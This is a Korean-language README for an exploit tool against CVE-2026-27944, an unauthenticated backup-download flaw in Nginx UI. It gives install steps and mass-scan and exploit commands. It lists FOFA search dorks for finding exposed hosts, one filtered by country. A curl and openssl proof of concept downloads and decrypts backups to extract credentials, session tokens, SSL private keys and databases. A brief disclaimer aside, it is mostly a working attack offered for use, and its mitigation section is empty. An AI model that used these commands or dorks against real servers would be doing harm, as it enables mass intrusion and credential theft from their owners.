
좋아 좋아
🚀 CVE-2026-27944: Nginx UI 인증되지 않은 백업 익스플로잇
📌 설명
27944.py는 공격자가 인증 없이 Nginx UI 백업을 다운로드하고 복호화할 수 있게 해주는 CVE-2026-27944용 익스플로잇 도구입니다.
이 취약점은 Nginx UI 버전 < 2.3.2에 존재하며 다음에 대한 액세스를 허용합니다:
· 사용자 자격 증명 및 세션 토큰 · SSL 개인 키 · Nginx 구성 · 데이터베이스 파일
🔧 기능
· ✅ 대상 파일에서 대량 스캔 · ✅ 단일 대상 익스플로잇 · ✅ 백업 자동 다운로드 · ✅ AES-256-CBC 자동 복호화 · ✅ 백업에서 자격 증명 자동 추출
🛠️ 설치 방법
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt
🚀 사용 방법
python 27944.py -f targets.txt -o hasil_scan
python 27944.py -t target.com:9000 --exploit --decrypt
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full
📋 대상 형식
target1.com:9000
192.168.1.1:9000
target2.com:8080
🎯 FOFA Dork
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"
📂 출력 결과
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
├── app.ini
├── database.db
├── nginx.conf
└── ssl/
⚠️ 면책 조항
이 도구는 교육 및 윤리적 보안 테스트 목적으로 제작되었습니다. 작성자는 이 도구의 오용에 대해 책임을 지지 않습니다. 본인이 소유한 시스템 또는 테스트를 위한 서면 허가를 받은 시스템에서만 사용하십시오.
📝 기술적 설명
CVE-2026-27944는 공격자가 인증 없이 /api/backup 엔드포인트에 접근할 수 있게 하는 Nginx UI의 치명적인 취약점입니다. 백업에는 AES-256으로 암호화된 민감한 데이터가 포함되어 있지만, 키와 IV는 X-Backup-Security 헤더를 통해 Base64 형식으로 전송됩니다.
CVSS 점수: 9.8 (치명적)
영향을 받는 버전: Nginx UI < 2.3.2
완화 조치:
💀 POC
# Cek vulnerability
curl -I http://target:9000/api/backup
# Download backup
curl -s http://target:9000/api/backup -o backup.bin
# Decrypt backup (manual)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip